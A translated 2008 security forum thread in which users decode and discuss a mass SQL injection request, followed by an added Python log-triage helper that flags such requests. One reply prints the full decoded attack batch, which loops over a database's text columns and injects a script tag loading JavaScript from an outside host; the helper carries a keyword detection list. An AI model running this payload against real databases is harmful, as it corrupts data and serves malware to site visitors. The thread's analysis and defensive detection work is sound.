youngman0707 |
SQL injection problem... please help analyze the code.. |
http://www.hackerschool.org/HS_Boards/zboard.php?id=QNA_recover&no=382
Hit : 3755 Date : 2008/11/10 03:27
youngman0707 | My knowledge is shallow, so.. when something like this happens.. how do I analyze it.. and how should I secure against it.. I'd appreciate any remarks from the experts.. Even a casual remark is a big help to me.. Have a pleasant day today as well.. |
2008/11/10 | |
초딩해커 | Heh.. bro, that's really rough.. Bro, do you know a bit of PHP? <? echo(urldecode("$str")); ?> If you pass the strange string above as the $str argument here, you'll feel a bit calmer. |
2008/11/10 | |
pr0sp3r | Dropping the header part, the actual attack query, after converting the hex value from 0x onward and then running urldecode, comes out as below.

%' ;dEcLaRe @S VaRcHaR(4000) SeT @s=DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR SELECT a.name,b.name FROM sysobjects a,syscolumns b WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN EXEC('UPDATE [' @T '] SET [' @C ']=RTRIM(CONVERT(VARCHAR(4000),[' @C '])) ''<script src=http://s.cawjb.com/s.js></script>''') FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Curso aS VaRcHaR(4000));eXeC(@s);-- aNd '%'= |
2008/11/11 | |
k1rha | I've been seeing this code really often lately, lol. It's a mass SQL injection attack. The actual defense is fundamentally the same as the defense against SQL injection, but the reason mass SQL became a hot topic is that it can bypass IDS/IPS. With that in mind, as for the defense, I've heard that you just need to add the syntax specific to mass SQL to your filtering rules ... | 2008/11/14 | |
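
The analysis pr0sp3r describes and the filtering k1rha mentions, as an added example that is not part of the original thread: a log-triage helper that URL-decodes a request's query string, hex-decodes any `0x...` blob in it, and flags the request when the decoded layers contain the keywords seen in the batch quoted above. It assumes the blob arrives as `CAST(0x... AS VARCHAR(4000))`, in line with the `aS VaRcHaR(4000))` tail in the quoted payload; the function names and the sample request are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# A run of at least 8 hex byte pairs after "0x"; case-insensitive because the
# payload in the thread mixes case (dEcLaRe, eXeC) to slip past naive filters.
HEX_BLOB = re.compile(r"0x((?:[0-9a-f]{2}){8,})", re.IGNORECASE)
# Keywords taken from the decoded batch quoted in the thread.
MARKERS = ("declare", "cursor", "sysobjects", "syscolumns", "exec(", "<script")

def blob_to_text(raw):
    """Decode a hex blob as UTF-16LE (NVARCHAR style) or single-byte text."""
    if len(raw) >= 2 and len(raw) % 2 == 0 and not any(raw[1::2]):
        return raw.decode("utf-16-le")
    return raw.decode("latin-1")

def decode_layers(query_string):
    """Return (url_decoded_text, [hex_decoded_blobs]).

    The inner text is not URL-decoded a second time, so '+' concatenation
    operators inside the hidden SQL are preserved.
    """
    text = unquote_plus(query_string)
    inner = [blob_to_text(bytes.fromhex(m.group(1)))
             for m in HEX_BLOB.finditer(text)]
    return text, inner

def analyze(query_string):
    """Flag a request that hides SQL in a hex blob and executes it."""
    text, inner = decode_layers(query_string)
    haystack = " ".join([text] + inner).lower()
    hits = sorted({k for k in MARKERS if k in haystack})
    return {"decoded": text, "inner_sql": inner, "markers": hits,
            "suspicious": bool(inner) and len(hits) >= 2}

# Constructed sample: same wrapper shape as the thread's payload, but the
# hidden statement is a harmless read-only query.
INNER = "DECLARE @T VARCHAR(255) SELECT name FROM sysobjects -- constructed sample"
SAMPLE = ("id=1%27%3BdEcLaRe+%40S+VaRcHaR(4000)%3BSeT+%40S%3DcAsT(0x"
          + INNER.encode("ascii").hex().upper()
          + "+aS+VaRcHaR(4000))%3BeXeC(%40S)%3B--")

if __name__ == "__main__":
    report = analyze(SAMPLE)
    print(report["suspicious"], report["markers"])
    print(report["inner_sql"][0])
```

Matching on the decoded layers rather than the raw request is what catches a payload whose SQL keywords never appear in clear text on the wire; as k1rha notes, the underlying fix remains the ordinary SQL injection defense.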